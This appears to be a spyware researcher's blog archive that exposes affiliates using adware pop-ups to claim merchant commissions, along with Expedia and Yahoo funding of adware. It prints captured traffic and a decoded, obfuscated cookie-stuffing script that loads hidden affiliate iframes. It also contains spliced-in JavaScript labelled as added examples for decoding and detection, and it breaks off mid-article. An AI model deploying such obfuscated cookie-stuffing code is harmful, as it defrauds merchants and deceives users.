There have been numerous reports of affiliates buying traffic from spyware — reports on my site (1, 2, 3, 4, 5) and elsewhere (1, 2, 3, 4). But to date, affiliate networks have failed to make substantial progress at stopping affiliate-spyware scams: These practices continue, affecting merchants with all major affiliate networks.

This piece proceeds in three parts. First, I show five specific examples of particular affiliates currently employing spyware to claim affiliate commissions, in apparent violation of applicable rules. (1, 2, 3, 4, 5) Second, I offer recommendations to concerned merchants. I conclude with recommendations for networks — suggesting technology and policy to stop this problem in the long run.

Example: Unknown Commission Junction Affiliate Targeting Dell with Gateway Popunders via Direct Revenue

A popunder promoting Gateway, purchased from Direct Revenue by a rogue affiliate. If a user ultimately makes a purchase from Gateway, the popunder causes Gateway to pay commissions to the affiliate, via Commission Junction. Gateway pays these commissions even though it did not know of or approve the affiliate’s decision to place advertising with Direct Revenue.

When users visit Dell.com on PCs infected with Direct Revenue, users may receive Gateway popunders. See screenshot at right, showing the Gateway popunder in a window marked Aurora (a Direct Revenue product name).

This advertising for Gateway does not occur because Gateway has requested that Direct Revenue advertise Gateway when users visit Dell’s site. Rather, a Gateway affiliate has purchased these ads. If a user subsequently makes a purchase from Gateway, the affiliate gets a commission, and these commissions let the affiliate pay Direct Revenue for showing the ad in the first place.

The ad at right is loaded via the following excerpted Direct Revenue targeting code (as recorded by my network monitor / packet sniffer). Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number and green highlighting marks the command to open the popunder. Extraneous code is omitted for brevity.

GET /imp/servlet/ImpServe?urlContext=http%3A%2F%2Fwww.dell.com%2F&domainContext=dell.com … HTTP/1.1

Host: xadsj.offeroptimizer.com …
 
HTTP/1.1 200 OK…
<BODY>
<title>—</title>
<SCRIPT LANGUAGE="JavaScript">

url="http://service.bfast.com/bfast/click?bfmid=37919389&siteid=41294023&bfpage=bf_advanced&bfurl=http%3A%2F%2Fwww.gateway.com%2Fhome";

winad=window.open(url, "_blank", attrib);

This action by the Gateway affiliate violates multiple Commission Junction policies: Direct Revenue software sometimes installs invisibly and without consent. Direct Revenue-delivered affiliate popups constitute forced clicks, invoking affiliate links without any affirmative end user action. The affiliate at issue is buying traffic from adware it did not design and does not control. The affiliate’s behavior also serves to overwrite cookies set by other affiliates, reducing others’ commissions. Each of these behaviors violates CJ’s Publisher Code of Conduct.

Example: Unknown Commission Junction Affiliate Targeting Dell via Direct Revenue

A popunder of Dell, purchased by a rogue affiliate and delivered via Direct Revenue as a user browses Dell.com. If a user ultimately makes a purchase from Dell, the popunder causes Dell to pay commission to the affiliate, via Commission Junction. So Dell ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit Dell.com on PCs infected with Direct Revenue, users may receive Dell popunders. See screenshot at right, showing such a popunder.

Here again, a rogue affiliate has placed ads through spyware — again without the merchant’s knowledge or approval. But notice the difference: In the Gateway example (above), the popup ad promoted a competitor of the site the user requested, whereas here the ad promotes the same site the user had already requested. What’s going on? Targeting Dell with Dell’s own affiliate link reveals an affiliate’s understanding that a user at Dell.com would probably most prefer to purchase from Dell, not Gateway. So the affiliate opens a Dell affiliate link — setting cookies such that if the user ultimately does purchase from Dell, the affiliate will get a commission. But the affiliate did nothing to facilitate the purchase or to fairly earn a commission; the user was already at Dell.com! Beyond cheating Dell, this affiliate also violated the CJ Publisher Code of Conduct for the reasons set out in the prior example.

Direct Revenue targeting code follows. Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number and green highlighting marks the command to open the popunder.

GET /imp/servlet/ImpServe?urlContext=http%3A%2F%2Fwww.dell.com%2Fcontent%2Fdefault.aspx%3Fc%3Dus%26cs%3D19%26l%3Den%26s%3Ddhs&domainContext=dell.com … HTTP/1.1

Host: xadsj.offeroptimizer.com

 
HTTP/1.1 200 OK

<BODY>
<title>—</title>
<SCRIPT LANGUAGE="JavaScript">

url="http://service.bfast.com/bfast/click?bfmid=37628499&siteid=41115962&bfpage=banner1";

winad=window.open(url, "_blank", attrib);

Example: Unknown LinkShare Affiliate Targeting eLuxury via 180solutions

A ‘double’ popup of eLuxury.com, purchased by a rogue affiliate and delivered via 180solutions as a user browses eLuxury. The popup claims commissions from eLuxury, via LinkShare, if a user ultimately makes a purchase from eLuxury. So eLuxury ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit eLuxury.com on PCs infected with 180solutions, users may receive popunders of the eLuxury site as reached through affiliate links. See screenshot at right, showing such a popup. Notice the resulting duplicate entries in the status bar (flagged at A), the creation of LinkShare cookies (B), and the second window just barely visible behind the new popup (C). (The usual 180solutions branding (in the browser title bar) was erased in the course of the LinkShare redirect.) See also a video of this popup, which presents the duplicate window particularly clearly.

As in the preceding examples, this affiliate has purchased ads through spyware — targeting the merchant’s web site with its own affiliate links. If a user browses to eLuxury on an infected computer, receives this popup, and makes a purchase, tracking systems at eLuxury and LinkShare will indicate that the affiliate has earned a commission — though in fact the affiliate did nothing to facilitate the purchase.

This affiliate’s actions entail multiple violations of the LinkShare Shopping Technologies Addendum (PDF). The affiliate has altered the user’s access, view, and usage of the merchant’s site, in violation of requirement 1.(i). The affiliate has purchased network traffic keyed to particular keywords in users’ requests, in violation of provision 6.5.(ii). Furthermore, 180solutions can trigger on traffic originating with other affiliates, thereby reducing their commissions in violation of 1.(ii).

180solutions targeting code follows, as observed via my network monitor. Yellow highlighting marks the targeting (the keyword eluxury), while red highlighting marks the affiliate ID number.

POST /showme.aspx?keyword=eluxury&…

Host: tv.180solutions.com

 
HTTP/1.1 200 OK

<HTML>

ad_url: <input id=ad_url name=ad_url value=http://click.linksynergy.com/fs-bin/click?id=DSOXp2QDjbg&amp;offerid=31266.10000067&amp;type=4&amp;subid=0>

Example: MyGeek (LinkShare Affiliate) Targeting J&R via Direct Revenue

A popunder of J&R, purchased by MyGeek and delivered via Direct Revenue as a user browses jr.com. If a user ultimately makes a purchase from J&R, the popunder causes J&R to pay commission to the affiliate, via LinkShare. So J&R ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit jr.com on PCs infected with Direct Revenue, users may receive J&R popunders. See screenshot at right, showing such a popunder.

Like the examples above, the popunder here is a popunder of the merchant’s own affiliate link — designed to claim affiliate commission from purchases that would have occurred even without the popunder. But here the popunder targeting is routed through an intermediary, MyGeek. Direct Revenue targeting code reveals what is occurring: First Direct Revenue opens a popunder (green highlighting) of a MyGeek URL (blue) (referencing MyGeek via IP address 66.179.234.169, which Whois confirms is indeed a MyGeek host). Then MyGeek redirects to LinkShare (red).

GET /a/Drk.syn?adcontext=http://www.jr.com/images/cart/btn_proceed_to_scheckout.gif& … HTTP/1.1

Host: btg.btgrab.com

 
HTTP/1.1 200 OK

adurl=http://66.179.234.169/cpv.jsp?s=7453&c=53491&p=110077&adultfilter=on&aid=586& …

 
 
GET /cpv.jsp?s=7453&c=53491&p=110077&adultfilter=on&aid=586& …

Host: 66.179.234.169

 
HTTP/1.1 302 Found

Location: http://click.linksynergy.com/fs-bin/stat?id=OAfBJvRKlyk&offerid=58654

That MyGeek performs such targeting is not entirely unknown. See a recent discussion at ABestWeb, with multiple participants reporting such observations. See also a cached MyGeek page (Google Cache copy, local copy) disclosing 180solutions and “OfferOptimizer” (Direct Revenue) as syndication partners. Nonetheless, MyGeek’s use of LinkShare affiliate links seems to entail multiple violations of LinkShare rules, exactly as set out in the preceding section.

Example: Wholesalingonline (LinkShare Affiliate) Targeting Hickory Farms via eXact Advertising

A popunder of Wholesalingonline.com, delivered by eXact Advertising’s BullsEye as a user browses hickoryfarms.com. The Wholesalingonline popunder uses tricky cookie-stuffing methods to set Hickoryfarms cookies automatically. So if a user ultimately makes a purchase from Hickory Farms, the popunder causes Hickory Farms to pay commission to Wholesalingonline, via LinkShare. So Hickory Farms ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit hickoryfarms.com on PCs infected with eXact Advertising, users may receive Wholesalingonline.com popunders. See screenshot at right, showing such a popunder.

At first glance, the Wholesalingonline popunder looks innocuous — just a random web site hoping to reach visitors who requested Hickory Farms. But the Wholesalingonline page at issue is specifically designed to set Hickory Farms affiliate cookies, despite the lack of any visible Hickory Farms content within the site. (For background on such practices, see my cookie-stuffing page, reporting dozens of such examples, all occurring without the use of spyware or adware.)

The Wholesalingonline page at issue sets cookies in the following way: First, Wholesalingonline delivers a page of encoded gibberish JavaScript, instructing use of the JavaScript “unescape” command to recover JavaScript code from hex-encoded ASCII. A snippet of the encoded original:

<HTML><HEAD><TITLE>Cut Out the Middle Man with Warehousing Direct</TITLE><SCRIPT type="text/javascript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%74%79%70%65%3D%22%74%65%78%74%2F%6A …

Decoding this block of code yields the following secondary decoder function, “q()”:

<SCRIPT type="text/javascript"><!-- function q(s){var o="",a=new Array(),w="",e=0;for(i=0;i<s.length;i++){c=s.charCodeAt(i);c=c^30;w+=String.fromCharCode(c);if(w.length>80){a[e++]=w;w=""}}o=a.join("")+w;return o}//--></SCRIPT>

Using the q() function to decode the remainder of the page yields the following HTML contents:

<frameset rows="0,100%" onLoad="top.mainFrame.location='http://www.wholesalingonline.com' …>
<frame src="http://208.55.59.48/41128/268749.htm" …>
<frame src="about:blank" …>

Notice that the page creates a frameset with two rows. The first, suspiciously set to be invisible (0 pixels in height), loads content from a server at 208.55.59.48. The second, the only visible frame, loads the wholesalingonline.com home page.

Sure enough, my packet sniffer confirms that the 208.55.59.48 page was indeed loaded immediately thereafter. That page offers an extremely lengthy (88KB) encoded JavaScript of its own, but decoding reveals the cookie-stuffing code copied below. Yellow highlighting flags the creation of an array of LinkShare affiliate links (IDs in red). Green highlighting flags random selection of one of the affiliate links (chosen based on the current time). Finally, an IFRAME (blue) embeds the affiliate link within the page — thereby invoking the affiliate link and setting cookies accordingly.

link = new initArray(
"http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0",
"http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0",
"http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000171&type=3&subid=0",
"http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000148&type=3&subid=0",
"http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000036&type=3&subid=0",
"http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0"
);

var currentdate = new Date();
var core = currentdate.getSeconds() % link.length;
var ranlink = link[core];

document.write('<DIV align=center><IFRAME SRC="' +ranlink+ '" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 scrolling="no"></IFRAME></a></DIV>');

Examination of my packet log confirms that a LinkShare affiliate link was ultimately invoked in exactly the way that this code specifies. Notice the HTTP Referer header, bearing the suspect 208.55.59.48 referring URL identified above (green).

GET /fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000036&type=3&subid=0 HTTP/1.1

Referer: http://208.55.59.48/41128/268749.htm
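The decoding steps walked through above, carried out as an added example (this is not the page’s code nor Wholesalingonline’s): it reverses the unescape and q() layers and then scans the recovered markup for zero-size frames that load an affiliate click link. The sample markup, the host 192.0.2.10 and the affiliate/offer IDs are constructed placeholders, and the two-network host list is an assumption.

```javascript
// Added example (not from the page or from Wholesalingonline): undo the two
// obfuscation layers described above and flag frames that load an affiliate
// link without ever being visible. Sample markup below is constructed; the
// affiliate ID, offer ID and hosts in it are placeholders, not the page's values.

// Layer 1: the outer page hands %XX-encoded ASCII to unescape(). This performs
// the same decode without the deprecated global unescape().
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Layer 2: the page's q() XORs each character code with 30. XOR with a
// constant is its own inverse, so one function both encodes and decodes.
function xor30(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) out += String.fromCharCode(s.charCodeAt(i) ^ 30);
  return out;
}

// Both layers in the order the page describes: percent-decode, then q().
function deobfuscate(encoded) {
  return xor30(percentDecode(encoded));
}

// Inverse of percentDecode(), used only to build encoded test input offline.
function percentEncode(s) {
  return Array.from(s, ch => '%' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}

// Click-URL hosts for the two networks the page shows (assumed list; extend as needed).
const AFFILIATE_HOST_RE = /^https?:\/\/(?:click\.linksynergy\.com|service\.bfast\.com)\//i;

// Report frames the user cannot see: the first row of a rows="0,..." frameset,
// and any WIDTH=0 / HEIGHT=0 iframe whose src is an affiliate click URL.
function findHiddenAffiliateFrames(html) {
  const findings = [];
  if (/<frameset\b[^>]*\brows\s*=\s*["']?\s*0\s*,/i.test(html)) {
    // \b after "frame" keeps <frameset> itself from matching here
    const frame = html.match(/<frame\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i);
    if (frame) findings.push({ kind: 'zero-height frame', src: frame[1] });
  }
  const iframeRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const tag = m[0];
    const hidden = /\b(?:width|height)\s*=\s*["']?0(?:px)?\b/i.test(tag);
    const src = tag.match(/\bsrc\s*=\s*["']?([^"'\s>]+)/i);
    if (hidden && src && AFFILIATE_HOST_RE.test(src[1])) {
      findings.push({ kind: 'hidden iframe', src: src[1] });
    }
  }
  return findings;
}

// Constructed outer page: the zero-height first row loads the stuffer, the
// visible row shows an ordinary storefront (placeholder hosts).
const OUTER_HTML =
  '<frameset rows="0,100%" onLoad="top.mainFrame.location=\'http://store.example.test\'">' +
  '<frame src="http://192.0.2.10/hidden/stuffer.htm" name="hidden">' +
  '<frame src="about:blank" name="mainFrame"></frameset>';

// Constructed stuffer output, shaped like what the document.write() above emits.
const STUFFER_HTML =
  '<DIV align=center><IFRAME SRC="http://click.linksynergy.com/fs-bin/click' +
  '?id=AFFILIATE-ID-PLACEHOLDER&offerid=0000.00000000&type=3&subid=0"' +
  ' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 scrolling="no"></IFRAME></DIV>';
```

Running deobfuscate(percentEncode(xor30(OUTER_HTML))) returns OUTER_HTML unchanged, and findHiddenAffiliateFrames() reports the zero-height frame in OUTER_HTML and the hidden iframe in STUFFER_HTML.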

Wholesalingonline’s methods are clearly more sophisticated than the other affiliates shown above; the multiple levels of encoding, obfuscation, framesets, randomization, and other trickery reveal Wholesalingonline’s desire not to get caught. But ultimately Wholesalingonline’s strategy is identical to the others: To make a merchant’s tracking system think that a user arrived at a merchant through its affiliate tracking link, such that a commission should be paid, when in fact no such commission is in order.

Additional Examples

I have been documenting examples of this behavior since spring 2004, and I have literally hundreds of examples on file, reflecting targeting of most major affiliate merchants. The examples above happen to focus on targeting using notorious advertising software from Direct Revenue, 180solutions, and eXact Advertising, but similar targeting remains widespread using pop-ups from ContextPlus, Kvmedia, and numerous others.

What Merchants Should Do

The commissions at issue are ultimately paid by merchants. Sophisticated, dedicated merchants can detect these fraudulent claims — and refuse to pay the commissions at issue.

Some merchants look to networks to identify and block improper affiliate actions. But as shown in the examples above and as discussed below, networks have failed to address this problem. In addition, independent merchants (those who recruit affiliates directly, without using an affiliate network) have no network to assist them in fraud prevention — meaning they’re all the more vulnerable to rogue affiliates.

As a first step in preventing affiliates from buying traffic from spyware vendors, merchants should specifically prohibit this practice, via new provisions in their affiliate terms & conditions. Merchants should also examine the affiliates who apply to their affiliate programs. But even careful screening of affiliates’ applications and sites can’t detect all rogue affiliates; some affiliates are entirely legitimate but for their use of spyware. Where an affiliate combines a legitimate affiliate web site with additional traffic purchased from a spyware vendor, mere examination of the affiliate’s web site will not reveal the spyware traffic.

Some merchants seek out rogue affiliates by looking for transactions with missing HTTP Referer headers. When a user clicks from one web site to another, the second server generally receives the URL of the originating page on the first server — the “HTTP Referer.” But when a page is loaded by spyware, i.e. as an unrequested popup, the referrer field is blank. So affiliates with blank referrers often turn out to be getting traffic from popups rather than from bona fide clicks within affiliates’ web pages. (That said, this method is imperfect too: Some popups submit fake referrer header data.)

These days, savvy merchants conduct testing of various spyware programs to identify rogue affiliates. It’s remarkably cheap to buy a few spare machines and infect them with a mix of spyware. For best results, merchants need to add packet sniffers or other detailed network logging, and all infected machines should be kept outside the corporate firewall. But with this equipment on hand, finding spyware-driven affiliates can require only a bit of browsing.

Other merchants hire outsiders to do this work. I provide this service to a few merchants, but there are plenty of other choices too. Some merchants even offer bounties (example: provision 3.b) to those who detect and report affiliates buying spyware traffic.

What Networks Should Do

Affiliate networks frequently boast of the quality of their affiliates. Commission Junction claims to “continually screen the network” for rogue affiliates, and to “monitor … all activity for signs of non-compliant client activity.” LinkShare claims that its network features “appropriate” affiliates. But in fact affiliate networks are plagued by affiliates whose practices defraud merchants rather than benefit them. Furthermore, despite their claims of quality, networks could do far more to eliminate rogue affiliates.

Stopping affiliates’ use of spyware must begin with comprehensive testing. In hands-on testing in my lab, I have documented literally hundreds of rogue affiliates — often dozens of different such affiliates in a single week. (See the examples above, as well as ten examples I posted during summer 2004.)

Beyond hands-on testing, efficient compliance requires special software to identify rogue affiliates automatically. I wrote such software earlier this year, and when I run this software against major adware programs, I often uncover dozens or scores of new rogue affiliates. In May, I posted summary results — analyzing 157,083 pop-up ads then shown by 180solutions, and finding that 686 claimed commissions via Commission Junction. (Others claimed commission via LinkShare, Performics, and numerous smaller or independent affiliate programs.) With automated testing methods now available, affiliate networks cannot credibly claim that large-scale testing is impractically difficult or unreasonably time-consuming.
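The blank-Referer check from the merchant section and the automated affiliate-ID extraction described here, as one added example (not the author’s software nor any network’s tool): it pulls the network and affiliate ID out of Commission Junction and LinkShare click URLs of the form shown in the examples above, and flags clicks that arrived with no Referer or while the user was already on the merchant’s own site. All hosts, affiliate IDs and records below are constructed placeholders.

```javascript
// Added example (not the page's or the networks' own code). It applies two
// merchant-side checks described in the text to constructed sample records:
// (1) affiliate clicks whose landing request carries no Referer, which is what
// spyware-launched pop-ups typically produce, and (2) affiliate links fired
// while the user was already on the merchant's own site.
// Affiliate IDs and hosts below are placeholders, not values from the page.

// Click-URL formats the page shows, with the query parameter that names the affiliate.
const NETWORKS = [
  { network: 'Commission Junction', host: 'service.bfast.com', idParam: 'siteid' },
  { network: 'LinkShare', host: 'click.linksynergy.com', idParam: 'id' },
];

// Extract network and affiliate ID from a click URL; returns null if it is not
// a recognised affiliate link. HTML-escaped ampersands (&amp;) are normalised
// first, since the URL may have been lifted out of markup as in the 180solutions capture.
function parseAffiliateLink(raw) {
  let u;
  try { u = new URL(raw.replace(/&amp;/g, '&')); } catch (e) { return null; }
  const net = NETWORKS.find(n => n.host === u.hostname.toLowerCase());
  if (!net) return null;
  const id = u.searchParams.get(net.idParam);
  return id ? { network: net.network, affiliateId: id } : null;
}

// Host comparison sufficient for this check: "www.dell.com" and "dell.com"
// are the same merchant.
function sameSite(hostA, hostB) {
  const strip = h => h.toLowerCase().replace(/^www\./, '');
  return strip(hostA) === strip(hostB);
}

// One record per affiliate click the merchant saw. Fields:
//   clickUrl - the affiliate link that was invoked
//   referer  - Referer header on the landing request ('' if absent)
//   browsing - host the user was on when the ad fired (e.g. the adware
//              request's domainContext, when captured), or null if unknown
// Returns the records that look like bought pop-up traffic, with reasons.
function flagSuspiciousClicks(records, merchantHost) {
  const flagged = [];
  for (const r of records) {
    const link = parseAffiliateLink(r.clickUrl);
    if (!link) continue;
    const reasons = [];
    if (!r.referer) reasons.push('blank Referer');
    if (r.browsing && sameSite(r.browsing, merchantHost)) reasons.push('user was already on merchant site');
    if (reasons.length) flagged.push({ ...link, reasons });
  }
  return flagged;
}

// Constructed sample traffic (placeholder IDs and hosts).
const SAMPLE_CLICKS = [
  // legitimate click from an affiliate's own review page
  { clickUrl: 'http://service.bfast.com/bfast/click?bfmid=0&siteid=AFF-LEGIT&bfpage=banner1',
    referer: 'http://reviews.example.test/laptops.html', browsing: null },
  // pop-under: no Referer, fired while the user was already on the merchant's site
  { clickUrl: 'http://service.bfast.com/bfast/click?bfmid=0&siteid=AFF-POPUNDER&bfpage=banner1',
    referer: '', browsing: 'www.dell.com' },
  // pop-up on another site with a Referer supplied: not caught by these two checks alone
  { clickUrl: 'http://click.linksynergy.com/fs-bin/click?id=AFF-OTHER&amp;offerid=0.0&amp;type=4&amp;subid=0',
    referer: 'http://ads.example.test/x', browsing: 'www.competitor.test' },
  // a direct visit, not an affiliate link at all
  { clickUrl: 'http://www.dell.com/', referer: '', browsing: 'www.dell.com' },
];
```

flagSuspiciousClicks(SAMPLE_CLICKS, 'dell.com') returns only the AFF-POPUNDER record, with both reasons attached; the third record shows why the Referer check alone is imperfect, as the text notes.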

It’s hard to know what testing methods affiliate networks actually use to conduct their testing: Networks usually treat their testing methods as confidential, either for competitive reasons or to avoid assisting would-be fraudsters. I sense that networks do do some hands-on testing, but their efforts may be less than merchants hope (especially given the size of networks’ fees). I don’t hear talk of affiliate networks running any automated testing of spyware programs. In any event, the scope of the spyware-affiliate problem reflects networks’ failure to resolve this issue: If networks were predictably catching affiliates who buy traffic from spyware, and if networks were predictably canceling any commissions claimed via such methods, scores of affiliates wouldn’t be continuing to attempt these methods.

Affiliate networks also need to impose tough penalties on those affiliates caught breaking the rules. For one, networks should take action promptly, not allow further commissions to be paid. But it’s not enough just to cancel current commissions: If breaking the rules yields only a slap on the wrist, then affiliates will continue the spyware assault, earning large profits until they’re ultimately caught. Instead, affiliate networks should get tough on spyware — demand repayment of commissions previously paid, to eliminate affiliates’ incentive to attempt to buy spyware traffic.

The more affiliate merchants pay out in commission, the larger merchants’ fees to affiliate networks. So networks have a clear incentive to look the other way, allowing spyware fraud to continue, with merchants paying the bill. But networks should not overplay their hand. It is at best unseemly for networks to profit when merchants are defrauded by rogue affiliates. Furthermore, the perception of spyware fraud in leading affiliate networks has created an opportunity for spyware and adware-free networks — Kowabunga, ShareASale, and others, as well as newcomer MPORT (which recently launched its network with the promise of blocking adware).

Last week’s announcement of LinkShare’s acquisition by Japanese portal Rakuten recalls the underlying promise of affiliate marketing. There is real value in affiliate relationships, and Rakuten certainly doesn’t intend to pay $425 million for a share in the spyware business. But does Rakuten understand the extent to which LinkShare funds payments to vendors who install advertising software without users’ consent? The extent to which LinkShare has failed to put a check on these behaviors? I’m not sure. Rakuten should demand better — and so should the merchants who ultimately pay for this mess.

How Expedia Funds Spyware

Unwanted advertising programs — typically called spyware — are funded by thousands of the world’s largest companies and most respected advertisers. Ask most of these advertisers about their support for spyware, and they’ll say they didn’t know. After all, their affiliates might have bought the ads. Their outsourced advertising placement firms might have made the decisions. Or pay-per-click search engines (including Google and Yahoo) might have syndicated their ads to spyware vendors, without advertisers’ knowledge or consent. (Details: Google, Yahoo)

But a few advertisers have the gall to defend advertising through spyware. Earlier this year, the Associated Press asked Expedia about its support for spyware. Expedia’s spokesman responded:

“It is just a marketing tool that we use.”

Expedia subsequently claimed to have “rigorous standards” for advertising software, including “mak[ing] sure customers want [the] ads.”

Despite Expedia’s claims of user consent, Expedia advertises with numerous programs that don’t get user consent at all.

Expedia Supports 180solutions, Direct Revenue, and eXact Advertising

The screenshots below show Expedia ads shown by the vendors listed at right. Below each vendor’s name are potentially-objectionable practices of that vendor — practices observed currently or in recent months. In each instance, practices include installation through security holes, with no notice or consent.

All ads were observed in September 2005. Click an ad to see a full-size screenshot with additional commentary.

An Expedia popup shown by 180solutions when I browsed to aa.com.

180solutions (Zango / 180search Assistant)

An Expedia popunder shown by Direct Revenue when I browsed to jetblue.com. Shown after activation of the popunder.

Direct Revenue (Aurora, Ceres, etc.)

An Expedia popunder shown by eXact Advertising when I browsed to jetblue.com. Shown after activation of the popunder.

eXact Advertising (BullsEye)

Intermediaries Placing and Tracking Expedia’s Spyware Ads

Comments from Expedia staff indicate that Expedia is aware of its relationships with “adware” vendors. Nonetheless, advertising intermediaries help facilitate, track, and fund these relationships. Users may therefore place some blame on advertising intermediaries.

In my May analysis of intermediaries helping to fund spyware, I offered as an example an Expedia ad served by 180solutions via aQuantive’s Atlas Solutions.

Other Expedia ads flow through other intermediaries, although each of the ads shown above ultimately reaches Expedia via Atlas Solutions. For example, the ad shown by eXact also passes through Xctrk.com (SearchBoss) and 24/7 Real Media before reaching Atlas.

Although spyware traffic reaches Expedia through advertising intermediaries, Expedia’s servers receive detailed information about the sources of newly-arrived users referred through spyware advertising. For example, see the partial screenshot below, showing an Expedia popup delivered by 180solutions, covering American Airlines at aa.com. Notice that the URL to Expedia includes the string “metdr” in the URL bar. “Metdr” is an abbreviation for MetricsDirect, 180’s advertising sales unit. The presence of this text in Expedia’s URL indicates Expedia’s specific knowledge that the ad is coming from 180solutions. Under these circumstances, Expedia cannot claim to be unaware that it is supporting 180solutions. My full ad screenshots present similar tracking codes in Expedia’s ads as shown by other spyware vendors.

What Expedia Should Do

While Expedia continues advertising with notorious spyware vendors, other major advertisers have ceased relationships with such vendors and publicly voiced their disapproval of these vendors’ practices. In June 2004, Major League Baseball announced (paid registration required) that it won’t work with companies who use spyware — specifically mentioning unwanted advertisements as a negative consequence of spyware, and thereby seeking to implicate the various vendors Expedia supports. Verizon also said it would cease advertising through what it called “adware.” Wells Fargo staff wrote an op-ed criticizing spyware, noting negative effects of unwanted advertising software on PC reliability as well as on web site integrity. More recently, Netflix announced its intention to cease such advertising (though in my testing, some Netflix ads are still distributed through the vendors listed above, often intermediated through Netflix’s affiliate program).

Expedia’s recent comments to the Associated Press propose an appropriate initial standard — that ads shouldn’t be shown to users through advertising software users didn’t agree to install. But if Expedia aspires to enforce this standard, it needs to better examine how advertising software actually becomes installed. As indicated by the many links above, spyware researchers have uncovered numerous nonconsensual installations of the very programs Expedia currently supports. Expedia staff should review industry sources and perhaps even conduct hands-on tests of their own, to make sure the vendors Expedia supports are not vendors that install without consent or otherwise engage in undesired practices.

These lessons also apply to other large travel sites. In my testing, travel ads appear particularly frequently through spyware, and in the course of recent testing, I received spyware-delivered ads promoting Cheaptickets, Hotels.com, Hotwire, Orbitz, Priceline, and Travelocity. In many instances, these vendors hire spyware to target each other — e.g. Travelocity might buy ads that cover Priceline’s site, but once a user reaches Travelocity, a new Priceline pop-up ad will pull the consumer right back. These many spyware-delivered ads entail large payments from travel services (and ultimately the consumers who fund them) to spyware vendors. The online travel industry would surely be better off if all firms agreed to cease this aggressive spyware-delivered advertising. By reducing funding of spyware, such an agreement would offer substantial benefits to consumers too.

How Yahoo Funds Spyware updated September 5, 2005

Yahoo’s Overture (recently renamed Yahoo Search Marketing) allocates pay-per-click (PPC) ads among Yahoo’s network of advertisers. When users run searches at yahoo.com, Yahoo’s advertisers are assigned placements at the top, right, and bottom of search results. Advertisers pay Yahoo a fee when users click on their ads.

But Yahoo doesn’t just show advertisers’ ads on yahoo.com; Yahoo also distributes advertisers’ ads to Yahoo’s various syndication partners. Many of these partners are entirely legitimate: For example, most advertisers will be happy to show their ads to users running searches at washingtonpost.com, where Yahoo sponsored links complement searches of Post articles.

However, serious concerns arise where Yahoo syndicates advertisers’ ads to be shown by advertising software installed on users’ PCs — software typically known as spyware or adware. In my testing, Yahoo’s funding of spyware is widespread and prevalent — an important source of revenue for many spyware programs installed on millions of users’ PCs. Were it not for Yahoo’s funding of these programs, the programs would be far less profitable — and there would be fewer such programs trying to sneak onto users’ PCs.

Yahoo’s funding of spyware is not unique. I’ve recently written about Google’s funding of similar bad actors (1, 2). Earlier this year, FindWhat disclosed related problems, admitting that terminating its dubious distributors would reduce revenues by at least 5%. But in my hands-on testing of various spyware-infected PCs, I find that I receive Yahoo-syndicated ads more frequently than I receive such ads from any other single PPC network.

This article proceeds in three parts. First, I show examples of Yahoo ads supporting Claria, eXact Advertising, Direct Revenue, 180solutions, and various others; I also review the objectionable practices of each of these vendors. (Numerous additional examples on file.) Second, I review Yahoo’s disclosures to advertisers — finding that Yahoo has failed to tell advertisers about its controversial syndication partners, even in general terms. I conclude with recommendations to Yahoo (and other PPC search engines that allow syndication), as to how to put an end to this mess and avoid such problems in the future.

Claria (Gator / GAIN): SearchScout Popunders of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Claria, targeting a Google search for the same phrase. Shown after activating the popunder.

A Yahoo Overture popunder, delivered by Claria, showing sponsored results for “computer” when users visit Dell.com. Shown after activating the popunder and right-clicking the ad to show its destination.

Diagram: PPC advertisers (i.e. Dell) → Yahoo Overture → Claria (Gator / GAIN). Money flows down the chain from advertisers; ad viewers flow back up.

The money trail – how funds flow from advertisers to Yahoo Overture to Claria.

Likely Yahoo’s largest single advertising software syndicator, Claria shows Yahoo Overture pay-per-click ads in popunders triggered by users’ web browsing.

Before showing Yahoo ads, Claria software must first become installed on users’ computers. Claria’s installation often proceeds without meaningful user consent. For example, Claria often gets installed through software bundles — where a user seeks one program but gets Claria too. Historically, Claria’s bundles have featured lengthy license agreements (as long as 5,900+ words and 63 on-screen pages), broken license formatting (missing line breaks, making section headings hard to find), and substantively unreasonable terms (including restrictions on how users can remove Claria software). Claria also promotes its software through banner ads — including ads on kids sites, claiming to fix computer clocks or improve computer security, showing a license only after installation has begun and cannot be cancelled. Some Claria uninstallers don’t work — leading users in circles rather than actually removing Claria software.

Claria’s core business is showing pop-up ads specifically purchased by advertisers. (See my 2003 listings, including well-known advertisers. See also PC Pitstop listing based on Claria 2003 disclosures.) But Claria also shows popunders of Yahoo Overture sponsored links. Search for “computer repair” at any major search engine, and Claria adds a popunder giving Yahoo Overture ads for that same term. Sponsored link popunders also target specific web sites. Visiting Dell often yields a Claria popunder of Yahoo Overture ads for “computer.”

